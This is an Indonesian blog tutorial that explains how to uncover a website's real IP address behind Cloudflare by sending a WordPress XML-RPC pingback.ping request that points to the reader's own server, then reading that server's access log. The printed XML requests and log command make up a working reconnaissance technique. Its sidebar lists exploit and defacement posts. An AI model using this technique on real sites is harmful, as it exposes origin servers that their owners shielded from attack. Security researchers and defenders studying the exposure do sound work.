• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress

March 5, 2020 by Jack Wilder 2 Comments

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback. Ada banyak cara yang bisa dilakukan untuk menemukan IP dibalik Cloudflare. Yang paling lazim digunakan adalah menggunakan DNS history. Namun jika website tersebut memiliki fungsi Pingback XMLRPC, misalnya WordPress, kita bisa memanfaatkan service tersebut untuk mengetahui IP dibalik Cloudflare.

Sebelum memulai tutorial ini, pastikan kalian juga memiliki satu buah VPS atau server yang sudah terinstall webserver.

Pertama, kita cek A record dari web target.

Terlihat dari screenshot diatas bahwa web tersebut menggunakan Cloudflare.

Oke, selanjutnya kita cek apakah website tersebut memiliki fungsi ping di XMLRPCnya. Di WordPress, kalian bisa melakukan post request ke file xmlrpc.php

Berikut request yang dikirim untuk melihat seluruh method yang bisa digunakan.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Jika method pingback.ping tersedia, kita bisa lanjut.

Selanjutnya kita login ke server kita, dan pantau access log ke web server.

Contoh

tail -f /var/log/nginx/access.log | grep cloudflare_bypass

Selanjutnya kita balik lagi ke web target. Buat request dengan method pingback.ping. Formatnya adalah

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://ip_server_kita/cloudflare_bypass</string>
</value>
</param>
<param>
<value>
<string>http://webtarget.com/postingan-artikel/</string>
</value>
</param>
</params>
</methodCall>

Jadi di web target harus ada artikel valid yang bisa kita gunakan untuk melakukan pingback. Untuk IP server kita, maksudnya adalah IP server VPS yang kita miliki. Pastikan juga web servernya sudah diaktifkan sehingga kita bisa cek log akses nya.

Contoh request dan respon nya di Burp Suite.

Dan di log access VPS kita, yang tercatat adalah IP asli web target, bukan lagi IP Cloudflare.

Selesai.

Sebenarnya kita juga bisa melakukan request ke file xmlrpc.php menggunakan curl. Namun di tutorial ini saya gunakan Burp Suite agar lebih jelas.

Oke mungkin itu saja tutorial kali ini, jika ada yang kurang jelas silahkan tinggalkan komentar.

Filed Under: Reconnaissance

Reader Interactions

Comments

  1. Karjok pangesty says

    November 17, 2020 at 8:47 am

    Mantepp

    Reply
  2. Gunawan says

    December 4, 2022 at 12:05 pm

    Kalau web phising, yg bukan wordpress gimana pak?.

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Surge.sh Custom Domain or Subdomain Takeover

Tumblr Custom Domain or Subdomain Takeover

WordPress 4.7.0/4.7.1 Content Injection Exploit

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Prestashop Module Blocktestimonial File Upload Auto Exploit

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

LinuxSec / 18 queries in 0.16 seconds